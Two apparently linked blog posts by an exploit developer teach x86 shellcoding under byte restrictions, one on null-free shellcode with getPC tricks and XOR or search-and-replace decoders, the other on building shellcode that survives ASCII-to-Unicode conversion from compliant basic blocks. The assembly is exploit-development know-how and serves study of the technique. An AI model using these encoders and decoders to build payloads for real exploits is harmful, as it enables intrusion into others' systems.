ASCII gone bad / Zer0-overflow

This post is a followup on my previous post on KISS shellcoding and exploitation. Like before this is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory )
The most common and classic shellcode char restrictions is “zero tolerance”. this can be solved in a verity of different methods. ranging from substitution to polymorphic escape decoders. Solving zero-tolerance is a very useful and thought-provoking problem, however provides a limited amount of fun:). especially once a basic set of solutions has been developed.

Let’s have a look at slightly more challenging problem – can we write shellcode that contains a null char at every other byte, and *only* every other byte, for e.g. s\x00h\x00e\x00l\x00l\x00c\x00o\x00d\x00e0

This can happen if our shellcode were to pass through a call to MultiByteToWideChar() or similar function. This is often encountered in browser bugs (especially DOM and/or scripting).

Some work has been done on this subject, namely a method was described by ngss reasercher Chris Anley. This method was coined “Venetian Blinds” or ”The Venetian exploit”. The method I suggest here is similar, but slightly different in that it does not make as many assumptions and presents a more theoretical approach. This work is an original unrelated effort.

Let us get to it.

Enumerating the methods we can use to write ugly ascii-to-unicode shellcode we find many are similar to regular zero-tolerance or ascii shellcode methods.

We can decode in-place, copy, byte-substitute. These methods will become more clear as you read. In some cases it will be necessary to find eip/getPC.

This also can be done in several ways, similarly to shown in my previous post, but differently( Try encoding FSTENV with null bytes, email me if you succeed :)

It will take many pages to thoroughly cover all of these methods and so I’ll start with the simplest copy method.

Instead of just presenting the final result, I will walk through my thought process working on this. In this post I present several different trials at shellcode, some of which are not immediately useful. This will allow you to better understand the intricacies shellcode-restriction, and get a feel for the different problems I faced.

Let’s copy our code somewhere. If we were to decode in-place, we would essentially write the same code, as well as extra getPC code.

Not as easy as it sounds. let us start from building restriction-compliant basic-blocks which can br used later. These blocks shall suffice:
1) set register
2) string operation
3) branch
4) glue block

These translate to:

1) mov reg32, imm32
2) mov [reg32],imm8
inc reg32 # imm8 !=0
3) jmp/call reg32
4) a “glue block” that can be use between every two blocks, and between two compliant opcodes. This is a compliant block that starts and ends with a null byte. we’ll mark it *GB.

if we want to get a bit fancier we may need:
3) pop reg32
4) mov [reg32],imm16 # imm16 bytes not equal 0
inc reg32
inc reg32

(U) basic block number one: setting a register – attempt 1.0
the following opcode:
mov ecx, 0×11223344
decodes like this:
B9 44332211

which of course is not very helpful to us. The best we can do with our restriction and this basic opcode is:
B9 00330011 == mov ecx, 0×11003300

this is not very useful. we want to be able to put an arbitrary value into r32. let’s divide in to two parts by bytes:

two lower bytes(“3rd and 4th”):let’s start by setting the two lower bytes. this is easy

*GB ; zero-out ecx
push 0
pop ecx

mov edx,77007700 BB00770077 ; use edx as help-reg

*GB
add ch,dh – 00F5 c
mov edx,66006600 – BB00660066.

*GB
add cl,dh – 00F1

This is a good method for the lower bytes. let’s call it “set (cx, 0×1122)”.

Those readers with a keen eye may notice that assembling these opcodes may not result in compliant shellcode.

This is because different byte-sequences may represent the same opcode. x86 opcodes are built of micro-codes or U-codes(with the greek letter mewh). Every Ucode performs a very basic operation. Several of these are dubbed “opcode”. Different sequences of Ucodes may result in the same end and therefore be functionally-equivalent, usually an assembler will choose the faster one.

topmost two bytes:
in order to set the topmost byte we can:

mov ecx,66006600 – BB00660066.

In order to set the topmost byte to zero we can: zero out the whole r32, later setting byte’s 3&4 . this is done by replacing our first opcode with the sequence:
push 0 – 6A00
pop ecx – 59

onwards.

we are now able to set the 1st,3rd, and 4th bytes of a register. how will we set the second? if the value needed is very low or very high we could:
set (cx, 0xFFFF)
*GB

inc ecx – 41
*GB
set (cx, 0xFFFF)
etc.

or

set (cx, 0×0000) ; this is not trivial, but easy
*GB
DEC ecx – 41

etc.

This method is not very space-conservative. let’s try finding a better method.

And now for something completely different – let’s find a better method. This time the process will include taking a peak at the intel x86 reference manual (I used the xeon manual) in search for interesting opcode encodings.

(U) basic block number one: attempt 2.0 – setting the top two bytes.

this time, we’ll try using program memory, specifically – the stack. this may a good method because many stack operations are single-byte. this may be bad, if sp points somewhere unwritable when the shellcode is running(but can be adapted).

fun fact – sifting through the intel reference manual we can see that the set of operands al /ax /eax can provide plenty compliant opcodes which will not be compliant with other registers used. for eg:
MOV DWORD PTR DS:[EBX],110011 – C7 03 11 00 11 00
MOV DWORD PTR DS:[EAX],110011 – C7 00 11 00 11 00

now consider the following opcodes:
push 11003300 – 6800330011
*GB
push esp – 54
*GB
pop eax – 58
*GB
add dword ptr [eax], 00220044
*GB
pop ecx

now ecx == 0×11223344
this is better than we expected. we have set all four bytes.

we already know how to change the two lower-most bytes if we want to zero them out. we also know how to zero out the 2nd topmost byte,or both high bytes. if we want to get 0×00112233 we can use (i’m omitting opcode encoding from hereon):

push 11003300 ; [esp] = 11003300
*GB
push 11003300 ; [esp] = 11003300
*GB
inc esp ; [esp] = 00110033
*GB
pop ecx ; ecx = 00110033
*GB
dec esp ; [esp] = 11003300
pop eax ; to restore stack

and then set the missing low bytes. We already know a different way of doing this – look for it.

Thus we have a compact method of performing mov r32,imm32 for any value.

(U) basic block no. 2: mov [reg32],imm8, inc reg32 # imm8 !=0 – attempt 1.0

First, let’s assume we know what data is present at the copy destination address. In this case, it will be pretty easy to build this BB. We will be using an add operation. here we are adding 0×90 to a one byte at [ecx], and ecx++.

mov eax,90009000 ; ah=90
add byte ptr [ecx],ah ; [ecx] += 0×90
inc ecx

this of course will be padded with *GB whenever needed. if we don’t know what data lays at [ecx] we could try this:
push ecx
pop eax ; eax =ecx
mov byte ptr al,[eax] ; al= [ecx]

;negate eax
push 0
pop ebx
add bh,al ; bh =al == [ecx]
xor ebx, ff00ff00
push 0
pop eax;
add al,bh ; al = al ^ 0xff == [ecx]^0xff
inc al ; al++ == -(byte ptr [ecx] )

;add negated value, and wanted value
mov edx, 11001100
add al,dh
add byte ptr [ecx],al ; [ecx] = [ecx] + (-[ecx] + dh) == dh == 11
inc ecx

once again, padded with *GB. this is not very elegant or small, but seems to work nicely. let’s give it another try. this time using completely different types of opcodes:
push esp
pop edx

inc ecx
inc ecx
inc ecx
inc ecx

push ecx
pop esp

set(ebx,0×90909090)
push ebx

push edx
pop esp

this looks nicer.

(U) 3) jmp/call reg32
this is easy:
push ecx
*GB
retn

(U) 4) the star of the evening – our very own – Glue Block we could try this:
ADD BYTE PTR SS:[EBP],AL – 004500

or this – after setting the right registers.

ADD BYTE PTR DS:[EAX],CL ; (we could probably pull eax off the stack, but can’t use set(eax,0xADDR) because we can’t use this GB, which is needed to do this there are probably a few others. Using these may require us to do minor fixups. this basically sums up everything we need to build a fancy ascii-to-shellcode decoder. now that we have our 4 basic blocks we can use them to program/ like this: 2-3-4-1-1-1-2-3-4-4/ just kidding. :)

An example simple windows code that copies four nop bytes to [7FFE0300 +0x100] looks like this:
what we would really be copying is a short code to find the original shellcode, and decode it. this is pretty simple straight-forward assembly

; ecx = 7FFE0400
68 0004007F PUSH 7F000400
0045 00 ADD BYTE PTR SS:[EBP],AL
54 PUSH ESP ; GB
58 POP EAX
8100 0100FE00 ADD DWORD PTR DS:[EAX],0FE0001
59 POP ECX
0045 00 ADD BYTE PTR SS:[EBP],AL
49 DEC ECX

;al = 0×90

0045 00 ADD BYTE PTR SS:[EBP],AL
B8 00900090 MOV EAX,90009000
00E0 ADD AL,AH

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL; [ecx] = 0×90
0045 00 ADD BYTE PTR SS:[EBP],AL
41 INC ECX ;ecx++

;byte ptr [ecx] = 0×90
;ecx ++

0001 ADD BYTE PTR DS:[ECX],AL [ecx] = 0×90
0045 00 ADD BYTE PTR SS:[EBP],AL
41 INC ECX

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL
41 INC ECX

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL
0045 00 ADD BYTE PTR SS:[EBP],AL

;jmp [ecx-4]

DEC ECX
DEC ECX
DEC ECX
DEC ECX

51 PUSH ECX
0045 00 ADD BYTE PTR SS:[EBP],AL
C3 RET

0000

Of course, all the methods I discussed here can be highly optimized(such using dword values?), and probably some other methods may be used. these are the basics :)

Also, if we want to keep a code-shellcode ratio anything close to plausible, we will have to be able to write small amount of bytes that can find the original chunk and decode it from our
destination address. this can very often be done through use of register and stack state at the time the shellocde started running. we’re in luck with this – pushad is compliant.

Share

KISS shellcoding and exploitation

In this blog i will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory :)
The work I do revolves around exploits and shellcodes in those exploits that we receive. In this blog post I will focus mostly on simple problems and aspects of writing exploits, and show how I have solved some of these problems in the past.

A common sight when looking for exploitation information is complicated c-and-ugly-assembly-string exploit or shellcode.  Rather than writing up another the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding.  My main focus will be explaining problems and issues often encountered and a offering simple, general approaches to a solution with an emphasis on working, easy-to-implement solutions.

Rather than building a full(“weaponized”) exploit i will go through the process of building a PoC.  Also, i may feel free to talk about some simple and effective ways of building an exploit-compilation framework.

I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.

SHELLCODING PRIMER

One of the main problems encountered when exploiting a vulnerability -  even if is is a simple stack overflow – is shellcode restrictions.  often, the nature of the specific vulnerability will prevent us from using specific bytes or force us to use certain combinations.  obviously, every constraint is different. let’s start with the classic  “zero-tolerance” restraint.  This means that our shellcode can not contain null bytes because it was probably originally part of a printable string.

This type of constraint is indeed a classic, text book, example, but is also a common problem in real-world shellcode writing and exploitation. This is very common in vulnerabilities surrounding textual streamds, such as html, xml, telnet and others  (Often these streams can be encoded in unicode but this creates different problems).

In the October patch-Tuesday alone we can find  that many vulnerabilities – especially those in ms09-054  - may require dealing with these limitations (when not serving a unicode-encoded webpage). This is the case with CVE-2009-2529, with some implementations of an exploit for CVE-2009-2530.  This is probably also the case for CVE-2009-2531 and many other vulnerabilities.

If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.

The answer is of course  a decoder. there are many examples of byte-substitution decoders out there written in hundreds of lines of C.
let’s see what the basic concept behind these is. We want to write code that does not concatenate any null-bytes. therefore we will obviously have to substitute the null-bytes  for something  different, or escape them. does substitution really cut it?

A quick histogram of all the code in kernel32.dll(or choose any other simple dll) shows us that some bytes tend to appear much less in code and printable data.
we can simply histogram our shellcode (use hex workshop) and choose a magic byte to replace.
[picture-histogram]

let’s see what the stages we need to take in order to decode our shellcode. I won’t talk about  OS-specific issues but they are mentioned
- find the position we are running from (aka getPC)
- deal with memory-permission issues
- rewrite our code

Locating home

Finding the position we are running from in order to be able to decode the shellcode, we must first be able to find it. unfortunately x86 does not allow direct access to eip (ia-64 does somewhat :) . we must find it indirectly. we have several methods of accomplishing this, each with benefits and drawbacks. i am already assuming no null bytes allowed.

We can use the CALL opcode, which will push our  position on to the stack

A naive method using call:
_SIMPLE_CALL_GETPC_
jmp START_GA;
@GET_ADDR:
pop edi;                // get the address that was pushed on to the stack
add edi,(@START_CODE-@RET_ADDR);   //here we calculate our needed address
jmp DECODE;
@START_GA:
call GET_ADDR;        //this will push address of @RET_ADDR on to stack. decodes as “E8FFFF… ”
@RET_ADDR:             //this address will be pushed
@END_GA:
@DECODE:
[decoder goes here]
@START_CODE

or we can use a slightly more sophisticated method:

_CALL_IN_TO_OPCODE_
@GET_ADDR:
call @AFTER_CALL- 1 (call $-1)  == “E8FFFFFFFF”
@AFTER_CALL
db  ’0xC8′
inc eax
@RET_ADDR:
pop edi
add edi,(@START_CODE-@RET_ADDR)

@END_GA:
@DECODE:
[decoder goes here ]
@START_CODE

What I did here is call in to the call opcode itself . this way the call will be to end-of-opcode-1, which will result in an opcode-encoding that does not contain null bytes, but 0xFFFFFFFF. this is because part of the opcode contains the jump distance and direction. in this case, -1. After the call an ‘dec eax’ (“FFC8″) opcode will be executed.  I could have easily executed a slightly different opcode, but this is fairly harmless, and after addein an ‘inc eax’  this will result in a fancy NOP.

Another option would be to  just use an existing function that can be called(eg. from windows using syscall gateway)
_CALL_EXISTING_FUNCTION_
xor eax,eax
push eax
add eax, 0x3E ; // this can be changed for anything which will not cause damage on specific OS. in this case ntclosefile(NULL);
mov edx,  7FFE0301 // windows “syscall gateway” pointer
dec edx
mov edx, [edx]
call edx        //this will perform an os-specific syscall
@RET_ADDR:
mov edi, [esp-4]
add edi,(@START_CODE-@RET_ADDR)
@END_GA:
@DECODE
[decoder]
@START_CODE

That’s about it for using call. another nice trick is using some fpu opcodes

fld1
FSTENV  [ESP-C] //push fpu state onto stack, including last address of last run fpu opcode. this can be replace by FSAVE/FSTENV/FXSAVW/some other?
pop edi
add edi….

A completely different approach would be to copy our code to a know place. lets choose 7FFE0410 for windows (assuming no nx-bit is present, we know space is not int use, also disregarding the fact that we cannot in reality write to this address, as it is read-only from user mode).
_COPY_THE_CODE_
mov eax, 0x7FFE0410 (7FFE0300+0×110)
[eax = shellcode_postion]
mov dword ptr [eax], 0×90909090 //NOPNOPNOPNOP – the prefect shellcode jmp/call eax

When copying a larger shellcode this will not be very compact/ in order to use string operations, we will have to getPC.  A variant of this method is the famous “seh method” , which essentially does the same, except it will use an interrupt to eventually jump to where the code was copied.

Decoding
Now that we have found our own code base- we can replace our escaped, or replaced bytes.  these are two simple – hack decoders which are easy to implement, and are good enough in many cases. These will only work if we have a byte value which does not appear in the code/data as I discussed above.

XOR_IT_ALL:

jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER  ;smaller than 0x7f. can be done multiple times
mov al, 0xA7

@REPLACE_NEXT:
mov byte ptr bl,[edi]
xor bl,al
inc edi
mov byte ptr [edi],bl
loop @REPLACE_NEXT

@END_DECODER :
NOP
NOP
NOP
NOP
NOP
@END_CODE:

Here we xor’d the whole code with the magic byte. If this magic byte did not exist in original code, than 0×00 would not exist in encoded code. A different method:

SEARCH_AND_DESTROY:
jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER;smaller than ox7f. can be done multiple times
cld
mov al, 0xA7
xor dl,dl

@REPLACE_NEXT:

repnz scasb
mov byte ptr [edi-1],dl
test ecx,ecx
jnz replace_next:
@END_DECODER
NOP
NOP
NOP
NOP
NOP
@END_CODE

in order to build a more robust decoder, which supports escaping, or alphanumeric encoding it is possible to write one from scratch in assembly. Skilined has written a very elegant decoder at http://skypher.com. Another option is and have a small-hack-custom-adapt decoder like the one we just wrote to decode a bigger decoder written in C.in the next upcoming post… i will show how i tried (and succeeded) in building shellcode which has gone through a process of ascii-to-unicode conversion. This shellcode will have to be written so that every second byte, and only every second byte will be a null-byte. try this at home. let me know if you have anything good.

leaving you with one more point for thought.. shellcode that will run on x86 and on x64..

Share